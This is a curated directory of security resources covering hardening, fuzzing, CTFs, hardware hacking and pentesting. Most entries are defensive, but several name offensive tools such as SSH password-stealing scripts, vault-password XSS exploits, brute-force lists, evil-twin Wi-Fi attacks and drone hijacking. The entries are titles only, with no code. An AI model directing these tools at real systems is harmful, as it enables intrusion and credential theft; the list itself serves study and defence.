• ghidra-scripts: A collection of my Ghidra scripts.
• Reversing Raw Binary Firmware Files in Ghidra
• Ghidrathon: The FLARE team's open-source extension to add Python 3 scripting to Ghidra.
• IDA Graph view with outlined function included
• G-3PO: A Protocol Droid for Ghidra repo

Frameworks

• Inject code into running Python processes
• malspider: Malspider is a web spidering framework that detects characteristics of web compromises.
• AIL-framework: AIL framework - Analysis Information Leak framework:

Patching

• Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)

Hardening

• BlueWars: Capture The Flag Defensivo que aconteceu na H2HC
• CCAT: Cisco Config Analysis Tool
• Ciderpress: Hardened wordpress installer
• debian-cis: PCI-DSS compliant Debian 7/8 hardening.
• Endlessh: an SSH tarpit.
• ERNW Repository of Hardening Guides: This repository contains various hardening guides compiled by ERNW for various purposes.
• fero: YubiHSM2-backed signing server
• FirewallChecker: A self-contained firewall checker
• Get SSH login notification on Telegram
• Hardentools is a utility that disables a number of risky Windows features.
• How To Secure A Linux Server: An evolving how-to guide for securing a Linux server.
• kconfig-hardened-check: A tool for checking the hardening options in the Linux kernel config
• Implementing Least-Privilege Administrative Models
• Iptables Essentials: Common Firewall Rules and Commands.
• iptables-essentials: Iptables Essentials: Common Firewall Rules and Commands.
• Keyringer: encrypted and distributed secret sharing software
• Keystone Project. Github: Keystone Enclave
• linux-hardened: Minimal supplement to upstream Kernel Self Protection Project changes.
• List of sites with two factor auth
• nftables: nftables is the successor to iptables. It replaces the existing iptables, ip6tables, arptables and ebtables framework. It uses the Linux kernel and a new userspace utility called nft. nftables provides a compatibility layer for the ip(6)tables and framework.
• Nice article with a lot of resources: Common approaches to securing Linux servers and what runs on them.
• opmsg: is a replacement for gpg which can encrypt/sign/verify your mails or create/verify detached signatures of local files. Even though the opmsg output looks similar, the concept is entirely different.
• prowler: AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and additional checks. Official CIS for AWS guide.
• reconbf: Recon system hardening scanner
• Sarlacc is an SMTP server that I use in my malware lab to collect spam from infected hosts.
• Secure & Ad-free Internet Anywhere With Streisand and Pi Hole
• Secure Secure Shell by stribika
• Securing Docker Containers. The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production.
• securityonion-docs
• security.txt: A proposed standard which allows websites to define security policies.
• security-txt: A proposed standard that allows websites to define security policies.
• See your site config with Hardenize
• Set up two-factor authentication for SSH on Fedora
• solo-hw: Hardware sources for Solo
• ssh-auditor: The best way to scan for weak ssh passwords on your network
• Streisand sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists.
• The Practical Linux Hardening Guide: 🔥 This guide details the planning and the tools involved in creating a secure Linux production systems - work in progress.
• tls-what-can-go-wrong: TLS - what can go wrong?
• upvote: A multi-platform binary whitelisting solution
• Using a Hardened Container Image for Secure Applications in the Cloud
• Zero-knowledge attestation
• Reverie: An optimized zero-knowledge proof system.
• RHEL Like systems:
  • CentOS7 Lockdown
  • RHEL7-CIS: Ansible RHEL 7 - CIS Benchmark Hardening Script
  • cisecurity: Configures Linux systems to Center for Internet Security Linux hardening standard.
• bdshemu: The Bitdefender shellcode emulator
• IPv6 Security Best Practices
• auditd: Best Practice Auditd Configuration.
• Hardened/PaX Quickstart
• tosh: Imagine your SSH server only listens on an IPv6 address, and where the last 6 digits are changing every 30 seconds as a TOTP code...
• Kubernetes:
  • 9 Kubernetes Security Best Practices Everyone Must Follow
  • NSA/CISA Kubernetes Hardening Guidance
• CHAPS: Configuration Hardening Assessment PowerShell Script (CHAPS)
• Awesome Windows Domain Hardening: A curated list of awesome Security Hardening techniques for Windows.
• NSA/CISA Kubernetes Hardening Guidance
• Learn and Test DMARC: Visualizing the communication between email servers will help you understand what SPF, DKIM, and DMARC do and how these mechanisms work.
• VideoLan Robots.txt
• ssh & linux cheat sheets
• ssh-audit: SSH server & client auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)

WebServers

• A lot of good posts by geek flare:
  • How to Configure SSL Certificate on Google Cloud Load Balancer?
  • Nginx Web Server Security & Hardening Guide
  • IBM HTTP Server Security & Hardening Guide
  • Apache Tomcat Hardening and Security Guide
  • How to Enable TLS 1.3 in Nginx, Cloudflare?
  • Apache Web Server Hardening & Security Guide (broken!??)
• CaCerts
  • List of free rfc3161 servers. TSA Servers
  • certstream-server: Certificate Transparency Log aggregation, parsing, and streaming service written in Elixir
• Apache:
  • Apache Security by Ivan Ristić
  • dotdotslash: An tool to help you search for Directory Traversal Vulnerabilities
  • A new security header: Feature Policy
  • How do I prevent apache from serving the .git directory?
• Nginx:
  • 20 Essential Things to Know if You’re on Nginx Web Server
  • Nginx C function: Create your desired C application on top of nginx module
  • NGINX config for SSL with Let's Encrypt certs
  • How to Configure Nginx SSL Certifcate Chain
• PHP:
  • Cheatsheet for finding vulnerable PHP code using grep: This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function.
  • It's All About Time. Time Trial- A tool for performing feasibility analyses of timing attacks. TimingIntrusionTool5000: A tool for performing network timing attacks on plaintext and hashed password authentication.
  • snuffleupagus: Security module for php7 - Killing bugclasses and virtual-patching the rest!
  • FOPO-PHP-Deobfuscator: A simple script to deobfuscate PHP file obfuscated with FOPO Obfuscator
  • Decode.Tools: Decode PHP Obfuscator by FOPO
• Ruby:
  • TSS - Threshold Secret Sharing: A Ruby implementation of Threshold Secret Sharing (Shamir) as defined in IETF Internet-Draft draft-mcgrew-tss-03.txt
• IT Security Guidelines for Transport Layer Security (TLS)
• A new security header: Feature Policy
• CAA Mandated by CA/Browser Forum
• dotdotslash: An tool to help you search for Directory Traversal Vulnerabilities
• ENVOY is an open source edge and service proxy, designed for cloud-native applications. code
• ghp: A simple web server for serving static GitHub Pages locally
• LEAR: Linux Engine for Asset Retrieval
• NFHTTP: A cross platform C++ HTTP library that interfaces natively to other platforms.
• Security/Server Side TLS by Mozilla
• security.txt: A proposed standard which allows websites to define security policies.
• urlscan.io: A sandbox for the web
• IT Security Guidelines for Transport Layer Security (TLS)
• QUIC's combined transport- and cryptographic handshake allows it to be 1 Round Trip faster than TCP + TLS and main problems.
• Secure Headers: Manages application of security headers with many safe defaults.
• HTTP/2: The Sequel is Always Worse blackhat
• RFC 9116: A File Format to Aid in Security Vulnerability Disclosure

Credentials

• WhiteIntel: WhiteIntel assists companies in identifying compromised credentials through malware campaigns.
• Search if your credentials where leaked: Cr3dOv3r
• pw-pwnage-cfworker: Deploy a Cloudflare Worker to sanely score users' new passwords with zxcvbn AND check for matches against haveibeenpwned's 5.1+ billion breached accounts
• XSS Exploit code for retrieving passwords stored in a Password Vault
• login_duress: A BSD authentication module for duress passwords
• XSStrike: Most advanced XSS detection suite.
• Was my password leaked? pwndb: Search for creadentials leaked on pwndb.
• bitwarden_rs: Unofficial Bitwarden compatible server written in Rust
• pcfg_cracker: Probabilistic Context Free Grammar (PCFG) password guess generator
• Depix: Recovers passwords from pixelized screenshots.
• pwndb: Search for leaked credentials.
• Password Lists: Password lists with top passwords to optimize bruteforce attacks.
• pwndb.py: Search for leaked credentials.
• KeePass awsome:Curated list of KeePass-related projects
  • KeePassium: KeePass-compatible password manager for iOS
  • Launch PowerShell Script From Within KeePass And Include Password Secure String Credential, PowerShell for KeePass Password Manager, PowerShell KeePass.
  • libkeepass: Python module to read KeePass 1.x/KeePassX (v3) and KeePass 2.x (v4) files.
  • KeepassXC-Pwned: Check your keepassxc database against previously breached haveibeenpwned passwords.

Tokens

• Use YubiKey security key to sign into AWS Management Console with YubiKey for multi-factor authentication
• Introducing the Qubes U2F Proxy
• YubiKey-Guide: Guide to using YubiKey for GPG and SSH
• Using a Yubikey for GPG and SSH: Sebastian Neef - 0day.work
• PIN and Management Key
• Improve login security with challenge-response authentication
• URU Card: Arduino FIDO2 Authenticator. uru-card
• YubiKey at Datadog
• This is a practical guide to using YubiKey as a SmartCard for storing GPG encryption and signing keys.
• yubikey-ssh-setup

Secure Programming

• Hardening C/C++ Programs Part II: Executable-Space Protection and ASLR
• Checklist of the most important security countermeasures when designing, testing, and releasing your API
• sanitizers
• Gitian is a secure source-control oriented software distribution method.
• Canary: Input Detection and Response
• Canarytokens by Thinkst, Quick, Free, Detection for the Masses canaryfy
• CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS
• How to Know if Someone Access your Files with Canary Tokens
• Wycheproof: Project Wycheproof tests crypto libraries against known attacks.
• Web App Security 101: Keep Calm and Do Threat Modeling
• SSL/TLS for dummies:
  • part 1: Ciphersuite, Hashing, Encryption;
  • part 2: Understanding key exchange algorithm;
  • part 3: Understanding Certificate Authority.
• heaphopper: HeapHopper is a bounded model checking framework for Heap-implementations
• Ristretto is a technique for constructing prime order elliptic curve groups with non-malleable encodings.
• SEI CERT C Coding Standard: The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community.
  • MSC24-C. Do not use deprecated or obsolescent functions
  • US-CERT: memcpy_s() and memmove_s()
• Safe C Library: The Safe C Library provides bound checking memory and string functions per ISO/IEC TR24731. These functions are alternative functions to the existing standard C library that promote safer, more secure programming.
• Field Experience With Annex K — Bounds Checking Interfaces
• TSLint: An extensible linter for the TypeScript language.
• rubocop: A Ruby static code analyzer and formatter, based on the community Ruby style guide.
• Librando: transparent code randomization for just-in-time compilers
• Checked C: Making C Safe by Extension. github
• Practical case: Buffer Overflow 0x01
• pigaios: A tool for diffing source codes directly against binaries. slides
• pigaios: A tool for diffing source codes directly against binaries. slides
• A Git Horror Story: Repository Integrity With Signed Commits. How to use git securely (signing commits)
• An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure
• Tooling for verification of PGP signed commits
• tlse: Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library
• tinyalloc: malloc / free replacement for unmanaged, linear memory situations (e.g. WASM, embedded devices...)
• Sandboxed API: Sandboxed API automatically generates sandboxes for C/C++ libraries
• HACL*: a formally verified cryptographic library written in F*
• Villoc: Villoc is a heap visualisation tool, it's a python script that renders a static html file.
• How C array sizes become part of the binary interface of a library
• MazuCC: A minimalist C compiler with x86_64 code generation
• When the going gets tough: Understanding the challenges with Product commoditization in SCA.
• huskyCI: huskyCI is an open source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics.
• (pt-br) GTER 47 | GTS 33 - Dia 2 (parte 1): nice talk by Daniel Carlier and Silvia Pimpão.
• HTTP Security Headers - A Complete Guide
• SAFECode: is a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods.
• Security Code Review 101
• Elliptic Curve Cryptography Explained
• Cheatsheet for finding vulnerable PHP code using grep: This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function.
• How to Process Passwords as a Software Developer
• QL: The libraries and queries that power CodeQL and LGTM.com
• Sendy is Insecure: How Not to Implement reCAPTCHA
• Win10 Crypto Vulnerability: Cheating in Elliptic Curve Billiards 2
• DevSecOps: Securing Software in a DevOps World
• GitGuardian Documentation and Resources: Resources to help you keep secrets (API keys, database credentials, certificates, ...) out of source code and remediate the issue in case of a leaked API key. Made available by GitGuardian. python API Client
• Vuln Cost - Security Scanner for VS Code: Find security vulnerabilities in open source npm packages while you code.
• Most Popular Analysis Tools by Programming Language
• Deepsource: tool that analyzes your repository.
• git-wild-hunt: A tool to hunt for credentials in github wild AKA git*hunt
• shhgit: Ah shhgit! Find GitHub secrets in real time.
• A Graduate Course in Applied Cryptography
• KaiMonkey: Vulnerable Terraform Infrastructure. KaiMonkey provides example vulnerable infrastructure to help cloud security, DevSecOps and DevOps teams explore and understand common cloud security threats exposed via infrastructure as code.
• You don’t need reproducible builds.
• Comments on build reproducibility
• DevSecOps – Integrating Security in the Development Pipeline
• SLSA: Supply-chain Levels for Software Artifacts, Proposal
• DazedAndConfused is a tool to help determine dependency confusion exposure.
• Security Scorecards: Security health metrics for Open Source. Check Documentation
• kcare-uchecker: A simple tool to detect outdated shared libraries.
• Package Hunter: A tool for identifying malicious dependencies via runtime monitoring.
• What science can tell us about C and C++'s security
• Awesome AppSec: A curated list of resources for learning about application security.
• Comments on build reproducibility

Web Training

• OWASP Broken Web Applications Project. OWASP BWA repository files.
• dvna: Damn Vulnerable NodeJS Application
• VulnLab: A web vulnerability lab project developed by Yavuzlar.

SAST

• Static analysis powered security scanner for your terraform code
• Scan (skæn) is a free open-source security audit tool for modern DevOps teams. sast-scan: A Free & Open Source DevSecOps Platform.
• Coccinelle: is a program matching and transformation engine which provides the language SmPL (Semantic Patch Language) for specifying desired matches and transformations in C code.
• brakeman: A static analysis security vulnerability scanner for Ruby on Rails applications.
• How disable comments make static analysis tools worse
• A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI
• Potential remote code execution in PyPI
• What's New with SAST + DAST
• DevSecOps with DAST and Security Hub
• Sonarqube Community Branch Plugin: A plugin that allows branch analysis and pull request decoration in the Community version of Sonarqube.
• SAST Analyzers
• Pip-audit: Google-backed tool probes Python environments for vulnerable packages.
• trivy: Scanner for vulnerabilities in container images, file systems, and Git repositories, as well as for configuration issues.
• Horusec.
• Source Code Analysis Tools
• COVERITY SCAN
• Trojan Source: invisible Source Code Vulnerabilities. repo
• Warn users when a PR contains some characters: Unicode bi-directional characters can be present but unseen and thus missed during the review. With this PR, we create a list of characters that we want to warn the users about if present in a PR. Since that list is configurable, it can be extended as needed/desired.
• ikos: Static analyzer for C/C++ based on the theory of Abstract Interpretation.
• A Guide On Implementing An Effective SAST Workflow

Secure Web dev

• OWASP:
  • Introduction to OWASP Top 10 2021
  • OWASP Web Security Testing Guide: The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services. portal
  • OWASP-Testing-Checklist
  • OWASP-Web-Checklist: OWASP Web Application Security Testing Checklist.
  • Projects/OWASP Node js Goat Project, repo
  • DependencyCheck: OWASP dependency-check is a software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies.
  • OWASP Risk Assessment Calculator. code
  • OWASP Top 10 Proactive Controls 2018
  • OWASP API Security Project
  • Exploiting OWASP Top 10 API Vulnerabilities.
  • vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises.
  • CheatSheets:
    • CheatSheetSeries: The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.
    • Password Storage Cheat Sheet
    • Database Security Cheat Sheet
  • OWASP Cornucopia
• The 2021 CWE Most Important Hardware Weaknesses
• secDevLabs: A laboratory for learning secure web development in a practical manner.
• Secure Modular Runtimes
• WebSecurity Academy
• Prototype pollution – and bypassing client-side HTML sanitizers
• Understanding the CSRF Vulnerability (A Beginner’s Guide)
• VulnyCode: PHP Code Static Analysis. Python script to detect vulnerabilities inside PHP source code using static analysis, based on regex
• PwnMachine: PwnMachine is a self hosting solution based on docker aiming to provide an easy to use pwning station for bughunters.
• WebSploit Labs: is a learning environment created by Omar Santos for different Cybersecurity Ethical Hacking (Web Penetration Testing) training sessions.
• Password Storage Cheat Sheet
• Database Security Cheat Sheet
• Introduction - OWASP Cheat Sheet Series
• Stop Password Masking: Usability suffers when users type in passwords and the only feedback they get is a row of bullets. Typically, masking passwords doesn't even increase security, but it does cost you business due to login failures.
• Forgot password? Taking over user accounts Kaminsky style
• CWE Top 25 Most Dangerous Software Weaknesses
• Datashare Server Mode
• GitLab analysis of OWASP Top 10 changes from 2004 to 2021
• oxAuth: OAuth 2.0 server and client; OpenID Connect Provider (OP) & UMA Authorization Server (AS).
• Prototype Pollution in Python

Formal Analysis

• A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs. paper/video
• SCYTHE's Community Threats Repository: Share SCYTHE threats with the community. #ThreatThursday adversary emulation plans will be shared here.

Fuzzing

• Generating Software Tests (github)
• afl-unicorn: Fuzzing Arbitrary Binary Code
• Regaxor: A regular expression fuzzer
• BrokenType: TrueType and OpenType font fuzzing toolset
• Dizzy-legacy: Network and USB protocol fuzzing toolkit.
• Start-Hollow.ps1: My musings with PowerShell
• auditd-attack: A Linux Auditd rule set mapped to MITRE's Attack Framework
• Dizzy-legacy: Network and USB protocol fuzzing toolkit.
• BFuzz: Fuzzing Browsers
• Structure-Aware Fuzzing with libFuzzer with fuzzer test suite
• Fuzzilli: A JavaScript Engine Fuzzer.
• Materials from Fuzzing Bay Area meetups.
• javafuzz: Javafuzz is coverage-guided fuzzer for testing Java packages.
• onefuzz: A self-hosted Fuzzing-As-A-Service platform.
• Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage
• ffuf: Fast web fuzzer written in Go
• rFuss2: Simple rust fuzzer
• RESTler finds security and reliability bugs through automated fuzzing. RESTler: is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. REST API Fuzz Testing (RAFT): Source code for self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows.
• Jackalope: Binary, coverage-guided fuzzer for Windows and macOS
• Dynamic Program Analysis by Dmitry Vyukov:
  • Bug Detection: ASAN, MSAN, TSAN (C++, Go, Java), KCSAN, LSAN, UBSAN
  • Bug Provocation: LibFuzzer (C++ [go, rust]), go-fuzz(go), syzkaller (kernels)
  • Production Hardening: CFI, SafeStack, ShadowCallStack, HWASAN, Memory Tagging(MTE), GWP-ASan, KFENCE
  • Misc: OSS-Fuzz, syzbot, SanitizerCovereage, KCOV,
• Fuzzing the Linux Kernel by Andrey Konovalov.
• Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors
• AFLplusplus: The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!
• s a n d s i f t e r: The x86 processor fuzzer.
• sandsifter: The x86 processor fuzzer.
• Fuzzing-101: Do you want to learn how to fuzz like a real expert, but don't know how to start?
• The Challenges of Fuzzing 5G Protocols
• Fuzzing Workshops
• AFLNet: A Greybox Fuzzer for Network Protocols.
• ClusterFuzz: is a scalable fuzzing infrastructure that finds security and stability issues in software.
• Introduction to VirtualBox security research

API

• The Web API Checklist: 43 Things To Think About When Designing, Testing, and Releasing your API
• API-Security-Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API
• REST API Checklist
• Your Comprehensive Web API Design Checklist
• API Security Testing: Rules And Checklist
• API Security Testing - How to Hack an API and Get Away with It:
  • Part 1 of 3
  • Part 2 of 3
  • Part 3 of 3
• API Security Checklist: Checklist of the most important security countermeasures when designing, testing, and releasing your API
• Istio: An open platform to connect, manage, and secure microservices.
• How to contact Google SRE: Dropping a shell in cloud SQL
• hack-requests: The hack-requests is an http network library for hackers
• Free API and Microservice Books
• MindAPI: Organize your API security assessment by using MindAPI. It's free and open for community collaboration.
• OWASP API Security Project
• Here you can find a variaty of resources to help you out on the API security path.
• Introducing vAPI – an open source lab environment to learn about API security

REST

• REST API Testing Tutorial: Sample Manual Test Case
• REST Security Cheat Sheet: CheatSheetSeries
• Penetration Testing RESTful Web Services
• RESTful web services penetation testing
• Astra: Automated Security Testing for REST API’s
• bad_json_parsers: Exposing problems in json parsers of several programming languages.

CTFs

• CTFd:
  • Deploying CTFd
  • CTFd Tips
• Mellivora is a CTF engine written in PHP
• Boss of the SOC (BOTS) Dataset Version 3
• SA-ctf_scoreboard
• The fast, easy, and affordable way to train your hacking skills.
• Write-ups for crackmes and CTF challenges by eleemosynator
• pwntools: CTF framework and exploit development library
• google-ctf
• Pwn2Win 2018. unsolved
• Leap Security
• 35c3ctf-challs
• ctf-tasks: An archive of low-level CTF challenges developed over the years.
• $50 million CTF Writeup.
• Alice sent Bob a meme - UTCTF 2019. tl;dr: Extract data from given images using binwalk, Tranform given diophantine equation into a cubic curve and retrieve EC parameters, Solve ECDLP given in extracted data using Pohlig Hellman Algorithm.
• RsaCtfTool: RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data
• RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED
• BalsnCTF-2019 by CykuTW
• HackTheBox CTF Cheatsheet: This cheasheet is aimed at the CTF Players and Beginners to help them sort Hack The Box Labs on the basis of Operating System and Difficulty.
• Mumbai:1 Vulnhub Walkthrough
• 0x0G 2020 CTF
• FIRST SecLounge CTF 2020 Solutions
• Hitcon2017CTF - 家徒四壁~Everlasting Imaginative Void~
• r2dec
• SASatHome
• Crypton: Library consisting of explanation and implementation of all the existing attacks on various Encryption Systems, Digital Signatures, Key Exchange, Authentication methods along with example challenges from CTFs.
• Bash injection without letters or numbers - 33c3ctf hohoho
• Writeup CTF - Web API Exploitation
• Closing Capture the Flag Session & Winning Team Presentation
• attack & defense CTF demo
• Deploying CTFd.
• ctftool: Interactive CTF Exploration Tool.
• CTF-Writeups: writeups for Capture The Flag Competitions.
• Capture the Flag
• DEF CON CTF 2021 QUALS and finals, files
• eDump
• HITB SECCCONF EDU CTF 2021: Developed with  by Hackerdom team and HITB.
• Planilhas Baby - Latinoware CTF 2021
• CTF KAVACON 21 – LUZ ROJA, LUZ VERDE
• RET2 WarGames
• (es) CTF: Aprende «hacking» jugando
• (es) HackLab #1
• Penetration testing laboratories "Test lab" emulate an IT infrastructure of real companies and are created for a legal pen testing and improving penetration testing skills.
• Solving Zden’s “1BiTCoiN WHiTe PaPeR” Puzzle

CTFs tools

• CTFs-Exploits
• nc-chat-ctf: Chat Server for CTF Players wrapped in SSL.
• thg-framework
• Super-Guesser-ctf
• Ciphr: CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
• sec-tools: A set of security related tools.
• Real World CTF 2023: Solving a Java CTF challenge by writing static analysis passes!

Phreak

• ss7MAPer (github)
• Into the wild: Gaining access to SS7 - Part 1: Finding an access point
• SCTP/SIGTRAN & SS7 Overview
• Security Penetration Test Framework for the Diameter Protocol
• Signaling Security in LTE Roaming
• Phrack

Archs

• ARM LAB ENVIRONMENT
• Azure IoT HUB
• A collection of vulnerable ARM binaries for practicing exploit development
• arm vm working out of the box for everyone
• Statically compiled ARM binaries for debugging and runtime analysis.
• Hacker Finds Hidden 'God Mode' on Old x86 CPUs -> rosenbridge: Hardware backdoors in some x86 CPUs
• USBHarpoon Is a BadUSB Attack with A Twist
• Ground Zero: Part 3-2 Patching Binaries with Radare2 - ARM64
• A 2018 practical guide to hacking RFID/NFC
• riscv-ida: RISC-V ISA processor module for IDAPro 7.x
• mac-age: MAC address age tracking
• Lexra: Lexra did implement a 32-bit variant of the MIPS architecture.
• IntelTEX-PoC: Intel Management Engine JTAG Proof of Concept
• me_cleaner: Tool for partial deblobbing of Intel ME/TXE firmware images.
• Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms
• IDA-scripts: IDAPro scripts/plugins
• Something about IR optimization: Hi hackers! Today I want to write about optimizing IR in the MoarVM JIT, and also a little bit about IR design itself.
• Dragonblood: Analysing WPA3's Dragonfly Handshake
• The Hacker's Hardware Toolkit: The best hacker's gadgets for Red Team pentesters and security researchers.
• Unfixable Seed Extraction on Trezor - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$.
• Extracting seed from Ellipal wallet
• Breaking Trezor One with Side Channel Attacks: A Side Channel Attack on PIN verification allows an attacker with a stolen Trezor One to retrieve the correct value of the PIN within a few minutes.
• Rewriting Functions in Compiled Binaries
• Deep Dive: Machine Check Error Avoidance on Page Size Change.
• Saleae: Saleae logic analyzers are used by electrical engineers, firmware developers, enthusiasts, and engineering students to record, measure, visualize, and decode the signals in their electrical circuits. downloads
• wacker: A WPA3 dictionary cracker.
• Osiris: Automated Discovery ofMicroarchitectural Side Channels
• One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization

Hardware

• Wifi-Ducky-ESPUSB
• USB Attacks: Past, Present and Future, P4wnP1 Covert Channel demo - P4wnP1 is below on pentesting section. wrap-up here
• PLATYPUS: With PLATYPUS, we present novel software-based power side-channel attacks on Intel server, desktop and laptop CPUs.
• VoltPillager: Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
• Analyzing a buffer overflow in the DLINK DIR-645 with Qiling framework, Part I
• ToorCon 14 Badge, and ToorChat.
• HammerKit: HammerKit is an open-source library for inducing and characterizing rowhammer that provides out-of-the-box support for Chrome OS platforms.
• Evil Logitech - erm I ment USB cable. USB Samurai For Dummies
• Hacker's guide to deep-learning side-channel attacks: the theory. SCAAML: Side Channel Attacks Assisted with Machine Learning
• Guarding Against Physical Attacks: The Xbox One Story
• Common BMC vulnerabilities and how to avoid repeating them, the unbearable lightness of BMC Perilous Peripherals: The Hidden Dangers Inside Windows & Linux Computers
• Blutetooth:
  • BLEAH: A BLE scanner for "smart" devices hacking.
  • BrakTooth: Causing Havoc on Bluetooth Link Manager. news and sources
  • Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
  • The Practical Guide to Hacking Bluetooth Low Energy
  • A Practical Guide to BLE Throughput
  • Exploiting IoT enabled BLE smart bulb security
• Wireless / Wifi:
  • ESP8266 Deauther Version 2: Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners!
  • Airspy-Utils: is a small software collection to help with firmware related operations on Airspy HF+ devices.
  • infernal-twin: wireless hacking - This is automated wireless hacking tool
  • Cracking WiFi at Scale with One Simple Trick
  • hcxdumptool: small tool to capture packets from wlan devices.
• Drone:
  • SkyJack is a drone engineered to autonomously seek out, hack, and wirelessly take over other drones within wifi distance, creating an army of zombie drones under your control. git repo
  • eaphammer: Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.
  • whereami: Uses WiFi signals and machine learning to predict where you are.
• Car Hacking:
  • Car hijacking swapping a single bit
  • Hacking a VW Golf Power Steering ECU - Part 1, Part 2 Part 3 and Part 4. VW PQ35 EPS flasher
• Internet of Things (IoT):
  • BMC-Tools: RDP Bitmap Cache parser.
  • Hacking Printers Wiki
  • Full key extraction of NVIDIA™ TSEC
• The x86 architecture is the weirdo, part 2
• Dark Flipper: Flipper Zero Unleashed Firmware
• Reverse Engineering Yaesu FT-70D Firmware Encryption
• Reverse-engineering an airspeed/Mach indicator from 1977
• Stepping Insyde System Management Mode: Intel’s Alder Lake BIOS source code was leaked online.

ARM

• Arm Heap Exploitation, by Azeria:
  • AZM Online Arm Assembler
  • Part 1: Understanding the Glibc Heap Implementation
  • Part 2: Understanding the GLIBC Heap Implementation
  • Heap Exploit Development– Case study from an in-the-wild iOS 0-day. thread
• ARM64 Reversing and Exploitation by prateekg147:
  • Part 1 - ARM Instruction Set + Simple Heap Overflow
  • Part 2 - Use After Free
  • Part 3 - A Simple ROP Chain

Pentesting

• Awesome Penetration Testing: A collection of awesome penetration testing resources, tools and other shiny things.
• Seclists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place.
• Search operating systems on the network: osquery
• osquery Across the Enterprise
• fleet: The premier osquery fleet manager.
• Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection
• Zero Day Zen Garden:
  • Windows Exploit Development - Part 0
  • Windows Exploit Development - Part 1
  • Windows Exploit Development - Part 2
  • Windows Exploit Development - Part 3
  • Windows Exploit Development - Part 4
• Got Meterpreter? PivotPowPY!
• Pentest Tips and Tricks
• Script to steal passwords from ssh.
• Network Infrastructure Penetration Testing Tool
• tcp connection hijacker
• "EAST" PENTEST FRAMEWORK
• Pown.js: is the security testing an exploitation framework built on top of Node.js and NPM.
• Sandmap is a tool supporting network and system reconnaissance using the massive Nmap engine.
• trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
• TIDoS-Framework: The offensive web application penetration testing framework.
• GitMiner: Tool for advanced mining for content on Github
• DHCPwn: All your IPs are belong to us.
• badKarma: advanced network reconnaissance toolkit.
• Danger-zone: Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files.
• go-tomcat-mgmt-scanner: A simple scanner to find and brute force tomcat manager logins
• IoTSecurity101: From IoT Pentesting to IoT Security
• IoT Pentesting and IoT-PT: A Virtual environment for Pentesting IoT Devices
• red_team_telemetry
• SharpSploitConsole: SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit.
• CrackMapExec: A swiss army knife for pentesting networks
• DarkSpiritz: A penetration testing framework for Linux, MacOS, and Windows systems.
• proxycannon-ng: A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference
• PentestHardware: Kinda useful notes collated together publicly
• MarkBaggett’s gists: This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation.
• Serverless Toolkit for Pentesters
• pentest_scripts: scrapes linkedin and generates emails list.
• Penetration Testing Tools Cheat Sheet ∞: Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test.
• IVRE: Network recon framework (github).
• (pt-br) DomainInformation: Tool para a identificação de arquivos, pastas, servidores DNS, E-mail. Tenta fazer transferência de zona, Busca por subdomínios e por ultimo, procura por portas abertas em cada ip dos subdomínios.. Desfrutem =)
